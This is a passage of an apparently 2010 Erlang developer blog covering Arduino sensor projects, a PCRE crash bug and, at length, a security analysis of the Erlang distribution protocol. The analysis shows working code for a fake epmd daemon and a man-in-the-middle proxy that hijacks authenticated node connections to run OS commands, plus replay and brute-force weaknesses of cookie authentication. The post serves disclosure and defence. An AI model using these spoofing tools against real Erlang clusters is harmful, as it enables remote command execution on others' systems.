<span class="Constant">2</span><span class="Statement">></span> Pid <span class="Statement">!</span> {send, <span class="Constant">1</span> <span class="Statement">bsl</span> <span class="Constant">2</span>}<span class="Special">.</span> <span class="Comment">% LED at position 3</span>
</pre><br />
<h1>Doing Something Useful</h1><br />
Switching LED's on and off programmatically is hours of fun. But, like many others have discovered before, hook it up to a monitoring system and it becomes sort of useful.<br />
<br />
I have a monitoring service running Nagios. Yeah, I think Nagios sucks too. The Erlang code does a request for the <i>tactical overview</i> page, parses out the statistics and sets the alert status accordingly.<br />
<script src="http://gist.github.com/364193.js?file=health.erl">
</script><br />
<h1>Monitoring Ambient Light</h1><br />
Here is another simple project: creating a graph of ambient light levels using an <a href="http://en.wikipedia.org/wiki/Light_Dependent_Resistor">LDR</a> and the really quite awesome <a href="http://github.com/psyeugenic/eplot">eplot</a> library.<br />
<br />
Connect the LDR to an analog pin and upload a sketch: <script src="http://gist.github.com/364190.js?file=LDR.pde">
</script> The Erlang code has 2 components: a process that periodically reads and stores the sensor data and a web server that displays a graph in PNG format.<br />
<pre class="Code"><span class="Identifier">light:start</span>()<span class="Special">.</span>
<span class="Identifier">sensor:start</span>()<span class="Special">.</span>
</pre>Reading the sensor:<br />
<script src="http://gist.github.com/364195.js?file=light.erl">
</script><br />
Displaying the graph:<br />
<script src="http://gist.github.com/364194.js?file=sensor.erl">
</script><br />
After the web server is running, the web page can be found by going to:<br />
<pre class="Code">http<span class="Special">:</span><span class="Statement">//</span><span class="Identifier">localhost:8889</span><span class="Statement">/</span>web<span class="Statement">/</span><span class="Identifier">sensor:graph</span>
</pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPO2xVgcEaUfl3_uyxD_Btxl82MFI8T-1p9Jp9yduOhlNdnZK3kWC4KbKbUA4cHjsrDHKAEG2rCE2iA6NbJqmPZEfDtvWaqxiU6asQJyWc2_HmQdyvLJP5DssDS9imEouDbF9srVqkTxY/s1600/sensor.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPO2xVgcEaUfl3_uyxD_Btxl82MFI8T-1p9Jp9yduOhlNdnZK3kWC4KbKbUA4cHjsrDHKAEG2rCE2iA6NbJqmPZEfDtvWaqxiU6asQJyWc2_HmQdyvLJP5DssDS9imEouDbF9srVqkTxY/s320/sensor.png" /></a></div><br />
(I think the spikiness was caused by a blinking LED somewhere around the LDR).Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-8577871288924093307.post-58604920002389646252010-03-31T19:41:00.008-04:002010-12-06T18:51:46.901-05:00Spoofing the Erlang Distribution Protocol(<b>Update (2010/09/15):</b> Well, that's annoying! With the release of Erlang R14B, it looks as if some of the issues with epmd have been fixed! Here is the log of the <a href="http://github.com/erlang/otp/commit/1ff4783ab8b1bdb32ced6072eb193896b429d115">commit</a> made by bufflig (Patrik Nyblom):<br />
<pre>Fix anomalies in epmd not yet reported as security issues
Use erts_(v)snprintf to ensure no buffer overruns in debug printouts.
Disallow everything except port and name requests from remote nodes.
Disallow kill command even from localhost if alive nodes exist.
-relaxed_command_check when starting epmd returns the possibility to
kill this epmd when nodes are alive (from localhost).
Disallow stop command completely except if -relaxed_command_check is given
when epmd was started.
Environment variable ERL_EPMD_RELAXED_COMMAND_CHECK can be set to always get
-relaxed_command_check.
</pre><br />
Fortunately (for those wishing to spoof the protocol), there are still other ways to <a href="http://github.com/msantos/spoofed/blob/master/src/npmd.erl#L118">kill epmd</a>.<br />
<br />
Awesome work by the Erlang/OTP team!)</p><br />
One of the unique features of the Erlang programming language is the transparent, built in distribution. The unit of activity in Erlang is the process. Processes run on nodes which reside locally or on remote servers, communicating by message passing. If a process somewhere crashes, a linked process running on another server can detect the crash and perform error recovery. <br />
<br />
Erlang distribution is very easy to use, pretty much working out of the box. But, in the default configuration, <a href="http://www.erlang.org/pipermail/erlang-questions/2007-July/027738.html">it's</a> <a href="http://www.erlang.org/pipermail/erlang-questions/2007-June/027076.html">often</a> <a href="http://dizzyd.com/sdist.pdf">advised</a> that the Erlang distribution protocol is <a href="http://github.com/erlang/otp/blob/dev/lib/kernel/internal_doc/distribution_handshake.txt#L14">insecure</a> and should only be run on trusted networks:<br />
<blockquote>[The cookie authentication mechanism] is not entirelly safe, as it is vulnerable against takeover attacks, but it is a tradeoff between fair safety and performance.</blockquote>So the questions are: what are the risks in running a distributed Erlang node, where can distribution be used safely and what can be done to limit potential attacks against it?<br />
<a href="http://github.com/msantos/spoofed">Source code</a> is available on github.<br />
<h1>Erlang Distribution</h1><h2>The Erlang Port Mapper Daemon</h2>Distributed Erlang nodes bind a random TCP port for distribution requests. The Erlang port mapper daemon, or epmd, maps the name of the node to the port on which the node is listening.<br />
<br />
epmd acts as a key/value store. A node registers with epmd by opening a TCP connection to localhost on a well known port (4396). The node sends a message containing the node name and distribution port. The node is now registered and will remain registered until the TCP connection is dropped.<br />
<br />
An example of a registration message is:<br />
<pre class="Code"><span class="Identifier">register</span>({IP, Port}, Key, Value) <span class="Statement">-></span>
Packet <span class="Statement">=</span> <span class="Statement"><<</span>
<span class="Constant">120</span>, <span class="Comment">% ALIVE2_REQ response: x</span>
<span class="Identifier">Value:16</span>, <span class="Comment">% PortNo</span>
<span class="Constant">77</span>, <span class="Comment">% NodeType: normal Erlang node</span>
<span class="Constant">0</span>, <span class="Comment">% Protocol: TCP</span>
<span class="Constant">0</span>,<span class="Constant">5</span>, <span class="Comment">% Highest Version</span>
<span class="Constant">0</span>,<span class="Constant">5</span>, <span class="Comment">% Lowest Version</span>
(byte_size(Node))<span class="Special">:</span><span class="Constant">16</span>, <span class="Comment">% NLen</span>
Node<span class="Statement">/</span>bytes, <span class="Comment">% NodeName</span>
<span class="Constant">0</span>,<span class="Constant">0</span> <span class="Comment">% ELen</span>
<span class="Statement">>></span>,
{ok, Socket} <span class="Statement">=</span> <span class="Identifier">gen_tcp:connect</span>(IP, Port, [
{packet,<span class="Constant">2</span>},
{active, <span class="Statement">true</span>},
<span class="Identifier">binary</span>
]),
ok <span class="Statement">=</span> <span class="Identifier">gen_tcp:send</span>(Socket, Packet),
wait(Socket)<span class="Special">.</span>
wait(Socket) <span class="Statement">-></span>
<span class="Statement">receive</span> _ <span class="Statement">-></span> wait(Socket) <span class="Statement">end</span><span class="Special">.</span>
</pre><h2>A Distributed Erlang Node</h2>A node is started in distributed mode when the <i>-sname</i> or <i>-name</i> option is passed on the command line to the <i>erl</i> command. Erlang will start an epmd process if one is currently not running.<br />
<br />
When a request is made to connect to another distributed Erlang node, for example by using <i>net_adm:ping('node@example.com')</i>, the Erlang node will resolve the portion of the node name after the @ symbol (or use localhost, if the node is brought up using <i>-sname</i>), and send a PORT_PLEASE2_REQ request for the name (the portion of the atom preceding the @ sign) to the resolved IP address. epmd responds with a message containing the node's port and closes the connection. <br />
<br />
The originating Erlang node now opens a TCP connection to the destination Erlang node's distribution port. The nodes authenticate each other using the Erlang cookie mechanism. If the challenge handshake succeeds, the nodes are connected. Communication is bidirectional. This link will be used for all distributed operations between the two nodes.<br />
<h2>Erlang Cookies</h2>Erlang cookie authentication resembles <a href="http://en.wikipedia.org/wiki/RADIUS">RADIUS</a>, <a href="ttp://en.wikipedia.org/wiki/Challenge-handshake_authentication_protocol">CHAP</a> and X11 magic cookies. Cookies are a secret that must be known on all members of the Erlang cluster. Valid characters in a cookie are ASCII 32-126 (space to tilde).<br />
<h2>Generating the Erlang Cookie</h2>If a secret is not provided, Erlang will generate a 20 byte file in the user's home directory (<i>~/.erlang.cookie</i>) composed of uppercase letters. Erlang uses a weak <a href="http://github.com/erlang/otp/blob/dev/lib/kernel/src/auth.erl#L412">pseudo-random number generator</a> with an implementation similar to <a href="http://linux.die.net/man/3/srand">rand(3)</a>. The seed is the seconds and microseconds fields of <i>erlang:now()</i>. The returned random value acts as the seed for the next random value until 20 uppercase letters are chosen. The creation time of the <i>~/.erlang.cookie</i> file is changed to midnight to obscure the initial seed value.<br />
<h2>The Challenge Handshake</h2>The challenge process is explained in the Erlang <a href="http://github.com/erlang/otp/blob/dev/lib/kernel/internal_doc/distribution_handshake.txt">kernel documentation</a>. <s>The kernel docs show a 4 byte digest used to verify knowledge of the secret, instead of the 16 byte digest generated by MD5. Maybe at one point the cookie mechanism used something like CRC32.</s>(The docs have been updated).<br />
<br />
After the TCP connection is established, the originating node sends:<br />
<div><ul class="Message"><li class="Message">"n"</li>
<li class="Message">Version0</li>
<li class="Message">Version1</li>
<li class="Message">Flag0</li>
<li class="Message">Flag1</li>
<li class="Message">Flag2</li>
<li class="Message">Flag3</li>
<li class="Message">Name0</li>
<li class="Message">Name1</li>
<li class="Message">Name2</li>
<li class="Message">...</li>
<li class="Message">NameN</li>
</ul></div>The version fields are 2 bytes and contain the minimum/maximum version of the distribution protocol supported by the node. The Name fields hold the bytes representing the full name of the originating node (node and domain name).<br />
<br />
The destination node replies with a status message indicating how the originating node may proceed. For example, the connection might not be allowed because a connection is in progress or might already exist.<br />
<div><ul class="Message"><li class="Message">"s"</li>
<li class="Message">Status0</li>
<li class="Message">Status1</li>
<li class="Message">...</li>
<li class="Message">StatusN</li>
</ul></div>If the status indicates the connection can continue, the destination node sends another message containing the challenge.<br />
<div><ul class="Message"><li class="Message">"n"</li>
<li class="Message">Version0</li>
<li class="Message">Version1</li>
<li class="Message">Flag0</li>
<li class="Message">Flag1</li>
<li class="Message">Flag2</li>
<li class="Message">Flag3</li>
<li class="Message">Challenge0</li>
<li class="Message">Challenge1</li>
<li class="Message">Challenge2</li>
<li class="Message">Challenge3</li>
<li class="Message">Name0</li>
<li class="Message">Name1</li>
<li class="Message">Name2</li>
<li class="Message">...</li>
<li class="Message">NameN</li>
</ul></div>This message contains the versions supported by the destination node, any compatibility flags, the 4 byte challenge and the node name. The challenge is generated by gathering some runtime statistics:<br />
<pre class="Code"><span class="Comment">%% ---------------------------------------------------------------</span>
<span class="Comment">%% Challenge code</span>
<span class="Comment">%% gen_challenge() returns a "random" number</span>
<span class="Comment">%% ---------------------------------------------------------------</span>
gen_challenge() <span class="Statement">-></span>
{A,B,C} <span class="Statement">=</span> <span class="Identifier">erlang:now</span>(),
{D,_} <span class="Statement">=</span> <span class="Identifier">erlang:statistics</span>(<span class="Special">reductions</span>),
{E,_} <span class="Statement">=</span> <span class="Identifier">erlang:statistics</span>(<span class="Special">runtime</span>),
{F,_} <span class="Statement">=</span> <span class="Identifier">erlang:statistics</span>(<span class="Special">wall_clock</span>),
{G,H,_} <span class="Statement">=</span> <span class="Identifier">erlang:statistics</span>(<span class="Special">garbage_collection</span>),
<span class="Comment">%% A(8) B(16) C(16)</span>
<span class="Comment">%% D(16),E(8), F(16) G(8) H(16)</span>
( ((A <span class="Statement">bsl</span> <span class="Constant">24</span>) <span class="Statement">+</span> (E <span class="Statement">bsl</span> <span class="Constant">16</span>) <span class="Statement">+</span> (G <span class="Statement">bsl</span> <span class="Constant">8</span>) <span class="Statement">+</span> F) <span class="Statement">bxor</span>
(B <span class="Statement">+</span> (C <span class="Statement">bsl</span> <span class="Constant">16</span>)) <span class="Statement">bxor</span>
(D <span class="Statement">+</span> (H <span class="Statement">bsl</span> <span class="Constant">16</span>)) ) <span class="Statement">band</span> <span class="Constant">16</span>#<span class="Constant">ffffffff</span><span class="Special">.</span>
</pre>The originating node computes the digest by concatenating the challenge with the cookie and digesting the result using MD5:<br />
<pre class="Code"><span class="Comment">%% Generate a message digest from Challenge number and Cookie </span>
gen_digest(Challenge, Cookie) <span class="Statement">when</span> is_integer(Challenge), is_atom(Cookie) <span class="Statement">-></span>
<span class="Identifier">erlang:md5</span>([<span class="Identifier">atom_to_list</span>(Cookie)|<span class="Identifier">integer_to_list</span>(Challenge)])<span class="Special">.</span>
</pre>The resulting 16 byte MD5 digest is sent to the destination node along with a new 4 byte challenge.<br />
<div><ul class="Message"><li class="Message">"r"</li>
<li class="Message">Challenge0</li>
<li class="Message">Challenge1</li>
<li class="Message">Challenge2</li>
<li class="Message">Challenge3</li>
<li class="Message">Digest0</li>
<li class="Message">Digest1</li>
<li class="Message">Digest2</li>
<li class="Message">...</li>
<li class="Message">Digest15</li>
</ul></div>The destination node verifies the received digest, computes a digest based on the origin node's challenge and replies with an acknowlegement message:<br />
<div><ul class="Message"><li class="Message">"a"</li>
<li class="Message">Digest0</li>
<li class="Message">Digest1</li>
<li class="Message">Digest2</li>
<li class="Message">...</li>
<li class="Message">Digest15</li>
</ul></div>If either digest does not match, the nodes will drop the connection and log a handshake failure. Authentication is performed for each TCP connection; no verification is done once the challenge process is established. If the TCP connection is dropped, for whatever reason, a new TCP connection must go through the authentication procedure again.<br />
<h1>Abusing epmd</h1><h2>Running epmd</h2>epmd comes from an environment where physical servers are dedicated to a single task. Probably all Erlang nodes ran under a single UID.<br />
<br />
On multiuser systems, such as development servers or systems that require some privilege separation, the first Erlang node to run starts and controls the epmd process. This user can now control the port map requests given for other nodes. The user running epmd can also snoop name requests. <br />
<br />
The temptation might be to explicitly start epmd as root at boot. Use a dedicated user, there's no reason to run as root.<br />
<h2>epmd Authentication</h2>epmd only requires a few operations: registering a node name and port, retrieving a port based on node name, retrieving all names and ports known to the epmd process (as well as some debug info, if requested), and shutting down epmd.<br />
<br />
Though logically these operations are distinct for remote and local access (a remote node, for example, would never register a node/port value, since ports are local to the node and do not include the IP address; in fact, the epmd command line flags such as "-names" will only connect to localhost), no distinction is made between local and remote access to epmd. Authentication is not required to query epmd.<br />
<br />
Any device that is allowed to open a TCP connection to the epmd port can:<br />
<ul><li>issue a kill command and shut down the epmd process: any new attempts at joining in Erlang distribution with nodes residing on this server will fail<br />
</li>
<li>set any key/value pair<br />
</li>
</ul>epmd allows storing of arbitrary bytes. "epmd -names" simply echoes these bytes. The output displayed by running "epmd -names" is the actual formatted message returned by the epmd server. So epmd could be used to store data, as long as the TCP connection is maintained. Some scenarios: <br />
<ul><li>bypass network segmentation: if 2 hosts can talk to the host running epmd but not each other<br />
</li>
<li>establish a covert channel<br />
</li>
</ul>Covert channels could be used for: <br />
<ul><li>interprocess communication, like a command queue for bots<br />
</li>
<li>tunnelling data: TCP over epmd over TCP!<br />
</li>
<li>storage of data: the basis of a FUSE filesystem<br />
</li>
</ul>A naive implementation might be to store an ID as the node name (the key), with the data stored in the 2 byte value allocated for the port. Even when using a secure transport layer (<a href="http://www.trapexit.org/Distributed_erlang_using_ssl_through_firewalls">ssl</a>, <a href="http://github.com/jj1bdx/sshrpc">ssh</a>) for the Erlang distribution protocol, nodes will still need a way of finding each other. epmd is too risky to place on a public network. <br />
<h1>Abusing Cookies</h1>The cookie mechanism only proves that, for the given TCP connection, there is knowledge of the secret. Though the node names are included in the challenge message, they are not included in the digest. Similarly, neither IP addresses or timestamps are included in the digest. The Erlang cookie authentication also does not validate the data sent after the handshake is completed, so there is no integrity checking built into the distribution protocol. <br />
<h2>Replaying the Challenge</h2>Erlang cookies are generated by concatenating a 4 byte challenge with a secret and digesting the result using MD5. The Erlang kernel documentation for this process notes the 32-bit integer used as the challenge must be very random, but really it needs only to be well distributed. The response to the challenge proves the node knows the secret. At least in theory, the only practical way to derive the secret from the digest is using brute force. But knowing the response to the challenge is equivalent to knowing the secret, if the challenge is ever repeated. The strength of the cookie mechanism lies in the time before a challenge is repeated. <br />
<pre class="Code"><span class="Constant">1</span><span class="Statement">></span> <span class="Identifier">cookie:start</span>()<span class="Special">.</span>
{<span class="Constant">11487</span>,
{found,{<span class="Constant">3534940387</span>,<span class="Constant">971</span>},
[<span class="Constant">88321801</span>,<span class="Constant">88780553</span>,<span class="Constant">92321534</span>,<span class="Constant">93695753</span>,<span class="Constant">94154505</span>,<span class="Constant">94809865</span>,
<span class="Constant">95268617</span>,<span class="Constant">96843513</span>,<span class="Constant">97367801</span>,<span class="Constant">97957625</span>,<span class="Constant">98481913</span>,<span class="Constant">99071742</span>,
<span class="Constant">99596030</span>,<span class="Constant">100120318</span>,<span class="Constant">100644606</span>,<span class="Constant">172271960</span>,<span class="Constant">172796248</span>,<span class="Constant">173320536</span>,
<span class="Constant">174041432</span>,<span class="Constant">176726281</span>,<span class="Constant">177250569</span>,<span class="Constant">177774857</span>,<span class="Constant">178561289</span>,
<span class="Constant">179085577</span>|<span class="Special">...</span>]}}
</pre>In the above test, an attacker would have had to snoop 971 handshakes before there is a repeated challenge. There are 2 challenges for each authentication. Only one successful connection is needed since the attacker can run <i>erlang:get_cookie()</i> once authenticated. However, being able to replay a challenge requires being able to somehow snoop connections. And for most systems, authentication is a rare event, since TCP connections for internode communication are persistent. <br />
<h2>Brute Force</h2>Since all nodes share the same cookie, and given that cookies likely change very rarely, its possible for the attacker to open connections to each node and brute force in parallel. Since MD5 is quite fast, and there is no provision in the protocol to slow down the digesting process, many attacks can be run. <br />
<h1>MITM</h1>For many environments, the threat of replay and brute force might not be that bad. While they are feasible, if you do any sort of monitoring, you'll very likely notice an attack in progress. The lack of any sort of integrity protection is a real issue; one that Erlang developers have addressed, to an extent, with the <a href="http://www.erlang.org/doc/apps/ssl/ssl_distribution.html">SSL transport mechanism</a>. <br />
<h2>Proxying from a Local Node</h2>Since anyone can stop epmd, an attacker on the same server can bring up their own port mapper service. When epmd is killed, the attached Erlang nodes will not attempt to reconnect. An attacker can listen on any available port, open a connection to the distribution port of the Erlang node that is being targeted and advertise the port of the spoofing proxy to any distribution requests. <a href="http://github.com/msantos/spoofed">spoofed</a> contains some code to demonstrate this sort of attack. First, we retrieve the ports known to epmd by sending a name request (the letter "n", with a 2 byte length header): <br />
<pre class="Code">names(IP, Port) <span class="Statement">-></span>
Packet <span class="Statement">=</span> <span class="Identifier">list_to_binary</span>([<span class="Statement"><<</span><span class="Constant">110</span><span class="Statement">>></span>]),
{ok, Socket} <span class="Statement">=</span> <span class="Identifier">gen_tcp:connect</span>(IP, Port, [
{packet,<span class="Constant">2</span>},
{active, <span class="Statement">true</span>},
<span class="Identifier">binary</span>
]),
ok <span class="Statement">=</span> <span class="Identifier">gen_tcp:send</span>(Socket, Packet),
wait(Socket)<span class="Special">.</span>
</pre>Next, we set up a fake epmd to answer port map requests. The fake empd binds the well-known epmd port and spawns a process to handle each TCP connection. For most message types, the client expects epmd to close the connection after responding. The exception is node registration: breaking the connection will deregister the node. <br />
<pre class="Code">loop(Socket, Port) <span class="Statement">-></span>
<span class="Statement">receive</span>
{tcp, Socket, <span class="Statement"><<</span><span class="Constant">110</span><span class="Statement">>></span>} <span class="Statement">-></span>
<span class="Identifier">inet:setopts</span>(Socket, [{packet, <span class="Constant">0</span>}]),
Response <span class="Statement">=</span> <span class="Identifier">list_to_binary</span>([
<span class="Statement"><<</span><span class="Identifier">4396:32</span><span class="Statement">>></span>,
<span class="Identifier">lists:flatten</span>(<span class="Identifier">io_lib:format</span>(<span class="Constant">"I can haz </span><span class="Special">~s</span><span class="Constant"> at port </span><span class="Special">~p~n</span><span class="Constant">"</span>, [<span class="Constant">"fake"</span>, Port]))
]),
<span class="Identifier">error_logger:info_report</span>([{epmd, names_request}, {response, Response}]),
ok <span class="Statement">=</span> <span class="Identifier">gen_tcp:send</span>(Socket, Response);
{tcp, Socket, <span class="Statement"><<</span><span class="Constant">122</span>, Node<span class="Statement">/</span><span class="Identifier">binary</span><span class="Statement">>></span>} <span class="Statement">-></span>
<span class="Identifier">inet:setopts</span>(Socket, [{packet, <span class="Constant">0</span>}]),
Response <span class="Statement">=</span> <span class="Statement"><<</span>
<span class="Constant">119</span>, <span class="Comment">% PORT_PLEASE2_REQ response</span>
<span class="Constant">0</span>, <span class="Comment">% Result: no error</span>
<span class="Identifier">Port:16</span>, <span class="Comment">% PortNo</span>
<span class="Constant">77</span>, <span class="Comment">% NodeType: normal Erlang node</span>
<span class="Constant">0</span>, <span class="Comment">% Protocol: TCP</span>
<span class="Constant">0</span>,<span class="Constant">5</span>, <span class="Comment">% Highest Version</span>
<span class="Constant">0</span>,<span class="Constant">5</span>, <span class="Comment">% Lowest Version</span>
(byte_size(Node))<span class="Special">:</span><span class="Constant">16</span>, <span class="Comment">% NLen</span>
Node<span class="Statement">/</span>bytes, <span class="Comment">% NodeName</span>
<span class="Constant">0</span>,<span class="Constant">0</span> <span class="Comment">% ELen</span>
<span class="Statement">>></span>,
<span class="Identifier">error_logger:info_report</span>([{epmd, Node}, {response, Response}]),
ok <span class="Statement">=</span> <span class="Identifier">gen_tcp:send</span>(Socket, Response);
{tcp_closed, Socket} <span class="Statement">-></span>
<span class="Identifier">error_logger:info_report</span>([{epmd, tcp_close}]);
{tcp_error, Socket} <span class="Statement">-></span>
<span class="Identifier">error_logger:info_report</span>([{epmd, tcp_error}])
<span class="Statement">end</span><span class="Special">.</span>
</pre>Finally, we set up the proxy to listen on the fake Erlang distribution port. The proxy just proxies any data, including the challenge handshake. Since the origin and destination nodes presumably share a common cookie, the authentication will succeed. Assuming 59000 is the distribution port of the Erlang node and port 59001 is unbound, we could run a proxy as follows: <br />
<pre class="Code"><span class="Identifier">spoof:kill</span>()<span class="Special">.</span>
<span class="Identifier">spoof:epmd</span>(<span class="Constant">59001</span>)<span class="Special">.</span> <span class="Comment">% where the argument is where our proxy port will be listening</span>
<span class="Identifier">spoof:proxy</span>(<span class="Constant">59000</span>, <span class="Constant">590001</span>)<span class="Special">.</span> <span class="Comment">% Erlang distribution port, fake Erlang node proxy port.</span>
</pre>At this point we can snoop the data being sent between nodes. Of course, we still do not know the cookie, only a derived secret (probably 2 of them), but the TCP connection from our proxy is fully authenticated. We could drop the connection to the originating node at this point and send our own messages as a fully connected distributed node: <br />
<pre class="Code">(<span class="Identifier">n@ack</span><span class="Special">.</span>lan)<span class="Constant">1</span><span class="Statement">></span> <span class="Identifier">erlang:get_cookie</span>()<span class="Special">.</span>
mysecretcookie
</pre>However, we can also modify the connection in interesting ways: <br />
<pre class="Code"><span class="Constant">1</span><span class="Statement">></span>F <span class="Statement">=</span> <span class="Statement">fun</span>(<span class="Special">in</span>,X) <span class="Statement">-></span> <span class="Identifier">re:replace</span>(X, <span class="Constant">"foo"</span>, <span class="Constant">"bar"</span>, [{return, <span class="Identifier">binary</span>}]);
<span class="Constant">1</span><span class="Statement">></span> (<span class="Special">out</span>,X) <span class="Statement">-></span> X <span class="Statement">end</span><span class="Special">.</span>
<span class="Constant">2</span><span class="Statement">></span><span class="Identifier">spoof:proxy</span>(<span class="Constant">59000</span>, <span class="Constant">590001</span>, F)<span class="Special">.</span>
<span class="Constant">3</span><span class="Statement">></span>foo <span class="Statement">==</span> bar<span class="Special">.</span>
<span class="Statement">true</span>
<span class="Constant">4</span><span class="Statement">></span>Afoo <span class="Statement">=</span> <span class="Constant">123</span><span class="Special">.</span>
<span class="Constant">123</span>
<span class="Constant">5</span><span class="Statement">></span>Afoo<span class="Special">.</span>
<span class="Constant">123</span>
<span class="Constant">6</span><span class="Statement">></span>Abar<span class="Special">.</span>
<span class="Constant">123</span>
<span class="Constant">7</span><span class="Statement">></span><span class="Identifier">rpc:call</span>(<span class="Type">'n@ack.lan'</span>, os, cmd, [<span class="Constant">"echo foofoo"</span>])<span class="Special">.</span>
<span class="Constant">"barfoo</span><span class="Special">\n</span><span class="Constant">"</span>
<span class="Constant">8</span><span class="Statement">></span> <span class="Identifier">rpc:call</span>(<span class="Type">'n@ack.lan'</span>, os, cmd, [<span class="Constant">"touch /tmp/ohaifoothere"</span>])<span class="Special">.</span>
[]
<span class="Constant">9</span><span class="Statement">></span> <span class="Identifier">rpc:call</span>(<span class="Type">'n@ack.lan'</span>, os, cmd, [<span class="Constant">"ls /tmp/ohaifoothere"</span>])<span class="Special">.</span>
<span class="Constant">"/tmp/ohaibarthere"</span>
</pre><h2>Proxying from a Remote Node</h2>Assuming an attacker can convince an Erlang node to connect to a host under their control (using DNS poisoning, ARP spoofing, social engineering, ...), the attacker can proxy the connection anywhere. There's a problem with proxying a connection from a host to a node that is not local, though. The challenge messages contain the full name of the node that is sending the message, including the domain name. Assume there are 3 nodes: <i>nul.lan</i> (the originating node), <i>ecn.lan</i> (the destination node) and <i>ack.lan</i> (the attacker). If an Erlang node on <i>nul.lan</i> accidentally connects to <i>ack.lan</i> intending to reach <i>ecn.lan</i> (or any other node sharing the same cookie), <i>ack.lan</i> can forward the connection to <i>ecn.lan</i>. <i>nul.lan</i> may not even have intended to connect to <i>ecn.lan</i>. <br />
<pre class="Code"><span class="Identifier">spoof:kill</span>()<span class="Special">.</span>
<span class="Identifier">spoof:epmd</span>(<span class="Constant">59001</span>)<span class="Special">.</span>
<span class="Identifier">spoof:proxy</span>({{<span class="Constant">10</span>,<span class="Constant">10</span>,<span class="Constant">10</span>,<span class="Constant">10</span>},<span class="Constant">59000</span>}, <span class="Constant">590001</span>, F)<span class="Special">.</span>
</pre>Since the source/destination node names will not match, we will need to re-write them for this to work, but since there are no integrity checks, the process works transparently: <br />
<pre class="Code">F <span class="Statement">=</span> <span class="Statement">fun</span>(<span class="Special">in</span>,X) <span class="Statement">-></span> <span class="Identifier">re:replace</span>(X, <span class="Constant">"@ack.lan"</span>, <span class="Constant">"@ecn.lan"</span>, [{return, <span class="Identifier">binary</span>}]);
(<span class="Special">out</span>,X) <span class="Statement">-></span> <span class="Identifier">re:replace</span>(X, <span class="Constant">"@ecn.lan"</span>, <span class="Constant">"@ack.lan"</span>, [{return, <span class="Identifier">binary</span>}]) <span class="Statement">end</span><span class="Special">.</span>
</pre><h2>Forcing a Node to Connect to Itself</h2>Even on a network where the attacker does not know which nodes share the same cookie, an Erlang node can always be forced to connect to itself. Since the Erlang node will use its cookie for both sides of the authentication, it will, of course, succeed. The attacker will only need to rewrite the node names. e.g., if <i>ecn.lan</i> thinks it's talking to <i>ack.lan</i>: <br />
<pre class="Code"><span class="Constant">1</span><span class="Statement">></span> F <span class="Statement">=</span> <span class="Statement">fun</span>(<span class="Special">in</span>,X) <span class="Statement">-></span> <span class="Identifier">re:replace</span>(X, <span class="Constant">"@ecn.lan"</span>, <span class="Constant">"@ack.lan"</span>, [{return, <span class="Identifier">binary</span>}]);
<span class="Constant">1</span><span class="Statement">></span> (<span class="Special">out</span>,X) <span class="Statement">-></span> <span class="Identifier">re:replace</span>(X, <span class="Constant">"@ack.lan"</span>, <span class="Constant">"@ecn.lan"</span>, [{return, <span class="Identifier">binary</span>}]) <span class="Statement">end</span><span class="Special">.</span>
<span class="Constant">2</span><span class="Statement">></span> <span class="Identifier">spoof:proxy</span>({IP, Port}, ProxyPort, F)<span class="Special">.</span>
erl <span class="Statement">-</span><span class="Special">name</span> <span class="Identifier">r@nul</span><span class="Special">.</span>lan <span class="Statement">-</span>remsh <span class="Identifier">n@ack</span><span class="Special">.</span>lan
<span class="Constant">1</span><span class="Statement">></span> <span class="Identifier">os:cmd</span>(<span class="Constant">"hostname"</span>)<span class="Special">.</span>
<span class="Constant">"ecn.lan</span><span class="Special">\n</span><span class="Constant">"</span>
</pre>This would work, for example, against a user connecting from a laptop to a node using <em>erl -remsh</em> or doing a <em>etop:start([{node, 'node@example.com'}])</em>. (It's worth mentioning as well, since I've never seen it discussed, that if you connect in to a distributed Erlang node, everybody who's authenticated to connect to that node has complete access to your workstation as your uid.)<br />
<h1>"Legitimate" Uses</h1><a href="http://github.com/msantos/spoofed">spoofed</a> could be used as an example for creating an epmd that provides some protection against remote nodes abusing it and for creating Erlang distribution proxies. An Erlang distribution proxy could potentially have these advantages: <br />
<ul><li>listens only to a single port<br />
</li>
<li> authentication mechanisms (GSS-API, SSL, etc)<br />
</li>
<li>could allow creating sandboxes by parsing the distribution messages<br />
</li>
</ul>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8577871288924093307.post-42668424487595909212010-03-09T16:01:00.000-05:002010-03-22T20:47:28.417-04:00When the Bugs Have BugsA few months ago, I found <a href="http://www.erlang.org/cgi-bin/ezmlm-cgi/2/1289">this</a>. Compiling a regular expression would crash beam.<br />
<pre class="Code">N <span class="Statement">=</span> <span class="Constant">819</span>,
<span class="Identifier">re:compile</span>([<span class="Identifier">lists:duplicate</span>(N, $(), <span class="Identifier">lists:duplicate</span>(N, $))])<span class="Special">.</span>
</pre>After going through a bit of effort, I figured out how to compile a debug version of beam. And then, of course, I discovered the clever minds behind Erlang have already thought about this and made it easy. Essentially, after compiling Erlang:<br />
<pre class="Code"><span class="Comment"># Recommended if you are a vi user</span>
<span class="Comment"># Yes, the debugger forces you to use emacs</span>
cat <span class="Statement">>></span> ~/.emacs
<span class="PreProc">(</span><span class="Special">setq viper-mode t</span><span class="PreProc">)</span>
<span class="PreProc">(</span><span class="Special">require </span><span class="Statement">'</span><span class="Constant">viper)</span>
<span class="Constant">^D</span>
<span class="Constant">export ERL_TOP=$(pwd)</span>
<span class="Constant">cd erts/emulator</span>
<span class="Constant">make debug FLAVOR=plain # or smp</span>
<span class="Constant">cd ~-</span>
<span class="Constant">bin/cerl -debug -gdb # -smp</span>
</pre>After reading through the source code and adding a few printf's, I tracked the bug down to an <a href="http://bugs.exim.org/show_bug.cgi?id=962">incorrect test</a> in PCRE. The magic number (819) apparently comes from:<br />
<pre class="Code"><span class="Constant">819</span> x <span class="Constant">5</span> bytes <span class="PreProc">(</span><span class="Special">capturing bracket</span><span class="PreProc">)</span> + <span class="Constant">3</span> bytes <span class="PreProc">(</span><span class="Special">opening bracket</span><span class="PreProc">)</span> <span class="Statement">=</span> <span class="Constant">4098</span> bytes
</pre>The compile workspace is 4096 bytes, so there is a 2 byte overflow. Well, today Phillip Hazel, the author of PCRE, corrected the bug. Awesome!! Thanks, Phillip!<br />
So here I am making the world safer one bug at a time, preparing a patch for Erlang. Except when I went to test the fix on Mac OS X, beam crashed. Ouch. This time:<br />
